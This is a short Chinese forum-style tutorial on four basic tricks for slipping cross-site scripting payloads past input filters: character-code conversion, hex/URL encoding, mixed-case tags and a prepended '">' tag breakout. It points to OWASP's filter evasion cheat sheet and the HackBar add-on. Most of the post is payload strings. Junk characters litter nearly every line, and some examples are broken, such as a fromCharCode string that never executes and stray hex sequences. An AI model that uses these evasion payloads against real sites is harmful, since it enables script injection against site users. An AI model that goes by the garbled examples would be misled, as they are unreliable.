四种超级基础的绕过方法。
. W; s8 y5 A2 J" ~) @+ N" r1.转换为ASCII码! Z+ T) ? p2 ?. I6 g
例子:原脚本为<script>alert(‘I love F4ck’)</script >% i2 f4 t' C' S
通过转换,变成:
. R; z& F( y* [<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>) q) b3 o: h4 R# b$ q
8 P! _6 _8 \1 T o. ?2.转换为HEX(十六进制)
& l* U1 n9 G! i* D' J9 t+ h' f例子:原脚本为<script>alert(‘I love F4ck’)</script>
+ Y1 x) O H8 B: ^# T7 D通过转换,变成:
h% K) B' h0 F t0 @: n$ D/ v%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e6 Q% U+ o$ f" O) G1 j& g
! ?- q2 `/ D7 }/ Y/ p3.转换脚本的大小写+ }2 N& f# a$ G2 b- e' I3 f
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( d( g; b+ Q4 I转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>$ f' d" r& f8 S. J
$ f8 f5 O1 q" S
4.增加闭合标记”>
' @2 u4 U$ b* T0 ?0 T* P例子:原脚本为<script>alert(‘I love F4ck’)</script>8 p2 F; o# ?: c) U- `& j& i, f
转换为:”><script>alert(‘I love F4ck’)</script>
* `& u X! Z) @更详细绕过技术请参考此网页
- S5 X f3 W! g6 g% ]https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet/ e5 S( T/ c0 D
1 M) p8 e" _4 e2 {% r7 M
转换工具使用的是火狐的 hackbar mozilla addon. |